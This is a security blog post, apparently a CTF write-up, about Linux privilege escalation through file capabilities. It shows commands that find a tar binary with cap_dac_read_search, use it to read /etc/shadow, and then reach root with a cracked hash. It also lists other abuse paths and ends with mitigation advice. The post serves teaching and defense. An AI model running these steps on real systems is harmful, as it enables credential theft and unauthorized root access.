Skip to content

NXNJZ

Linux and Security

  • BLOG
  • Cowsay Fortune
  • Contact
  • Gitlab
  • Company Homepage

An Interesting Privilege Escalation vector (getcap/setcap)

Posted on August 21, 2018 - February 16, 2019 by nxnjz

Introduction

I recently came across an interesting way of escalating privileges on a GNU/Linux system during a CTF challenge. It involves file/process capabilities.

In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this ‘permission’ without having it run with complete root privileges. This allows for a more secure system in general. For more info about this subject, click here.

getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on debian and debian-based distributions.

 

 

Privilege Escalation

 

We would start by scanning the file system for files with capabilities using getcap -r /   The -r flag tells getcap to search recursively, ‘/‘ to indicate that we want to search the whole system.

The output is usually filled with tens or hundreds of  “Operation not supported” errors, making it hard to read. We can redirect errors to /dev/null to get a cleaner output.

nxnjz@test-machine:~$ getcap -r / 2>/dev/null
/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep

 

An unusual finding: tar has cap_dac_read_search capabilities. This means it has read access to anything. We could use this to read SSH keys, or /etc/shadow and get password hashes.

/etc/shadow is usually only readable by root:

nxnjz@test-machine:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

 

But since tar has that capability, we can archive /etc/shadow, extract it from the archive and read it.

nxnjz@test-machine:~$ ls
tar
nxnjz@test-machine:~$ ./tar -cvf shadow.tar /etc/shadow
./tar: Removing leading `/’ from member names
/etc/shadow
nxnjz@test-machine:~$ ls
shadow.tar tar
nxnjz@test-machine:~$ ./tar -xvf shadow.tar
etc/shadow
nxnjz@test-machine:~$ ls
etc shadow.tar tar
nxnjz@test-machine:~$ cat etc/shadow
root:$1$xyz$Bf.3hZ4SmETM3A78n1nWr.:17735:0:99999:7:::
daemon:*:17729:0:99999:7:::
bin:*:17729:0:99999:7:::
sys:*:17729:0:99999:7:::
sync:*:17729:0:99999:7:::
games:*:17729:0:99999:7:::
man:*:17729:0:99999:7:::
lp:*:17729:0:99999:7:::
mail:*:17729:0:99999:7:::
news:*:17729:0:99999:7:::
uucp:*:17729:0:99999:7:::
proxy:*:17729:0:99999:7:::
nxnjz:$1$sTfA$SnnNO9Cflvs4aq4ZCU/6J/:17764:0:99999:7:::

 

After cracking that password hash for root, which turns out to be ‘root1234’, we can login using su:

nxnjz@test-machine:~$ su root
Password:
root@test-machine:/home/nxnjz# whoami
root
root@test-machine:/home/nxnjz#

 

 

Conclusion & Mitigation

 

This is simply an example of how capabilities can serve as a privilege escalation vector. Another very useful capability in a scenario like this would be cap_dac_override, which allows full read/write/execute access. This obviously could be used in various ways to escalate privileges, including but not limited to, adding a root user to /etc/passwd or /etc/shadow, modifying cron jobs running by root, adding a public ssh key to /root/authorized_keys, or simply opening a root shell.

Keep in mind that the presence of a potentially exploitable capability does not guarantee privilege escalation. You’re still limited by the functionality of the executable in question.

Besides, capabilities are rarely used in the wild. System administrators rarely set/change capabilities.

System Administrators should make sure that no abusable or exploitable capabilities are assigned on their file system. Capabilities are generally safer than SUID, but they may still pose a risk.

 

 

 

 

Posted in Privilege EscalationTagged getcap, linux, privesc

Post navigation

Exploiting XXE
Linux Privilege Escalation Checklist

10 Comments

  1. Shadow6 says:
    October 27, 2018 at 3:59 am

    Great write up. I appreciate this. Helped me get through a CTF on HTB. Thanks for the help!!

    Reply
    1. juntao says:
      November 13, 2018 at 4:20 pm

      hey me too, I think you talking about finding W htb.

      Good article, you are the man.

      Regards

      Reply
      1. quas says:
        November 24, 2018 at 5:50 am

        hehe, I found this writeup just after rooting W at htb.. would’ve helped xP

        Reply
  2. Bob Jones says:
    May 11, 2019 at 4:05 am

    Great Post

    Reply
  3. Pingback: Lightweight – Yekki's Blog
  4. wini says:
    September 12, 2019 at 6:11 am

    Interesting article! Thanks.

    Reply
  5. Pingback: Linux Privilege Escalation Checklist - NXNJZ
  6. sait says:
    October 5, 2020 at 8:12 am

    very simple and helpful. Thank you!

    Reply
  7. B1gD4Ddy says:
    June 21, 2021 at 9:35 am

    Great article author..this just helped me understand a new way of PrivEsc in linux..I had read abt this b4 but was always scratching my head to fully understand it..Now I know it all..Thanks to u. 🙂

    Reply
  8. Pingback: Writeup: HackTheBox Cap - Without Metasploit (OSCP Prep) - Learn from Tutorial - Abu Sayed

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • CVE-2021-42052 full disclosure
  • How to Set Up an Interactive SSH Honeypot on CentOS 8.
  • HackTheBox.eu Jarvis Writeup
  • How to setup a simple proxy server with tinyproxy (Debian 10 Buster)
  • How to Install qdPM 9.1 on Debian 10 LEMP

Tags

802.11 ampache apache aspx bash cd centos cms crm cve debian exploits fedora fulldisclosure hackthebox honeypot http httpd ifconfig iw iwconfig labs lfi linux mariadb memory monit music nginx pastebin php privatebin privesc project management proxy reconnoitre selinux shopt ssh systemd txpower ubuntu wallabag wireless xxe

Categories

  • BASH (1)
  • CTF/Labs (2)
  • CVE / full disclosure (1)
  • Information Gathering (1)
  • Linux (25)
  • Password Cracking (1)
  • Privilege Escalation (2)
  • SQL Injection (1)
  • Web-Shells (1)
  • Wifi (2)
  • XXE (1)

Recent Comments

  • Christian Mora on Installing Ampache on CentOS 7.
  • Mike on How to Install PrivateBin on Debian 9.
  • Writeup: HackTheBox Cap - Without Metasploit (OSCP Prep) - Learn from Tutorial - Abu Sayed on An Interesting Privilege Escalation vector (getcap/setcap)
  • JD on How to Install SuiteCRM on Debian 10 Buster
  • B1gD4Ddy on An Interesting Privilege Escalation vector (getcap/setcap)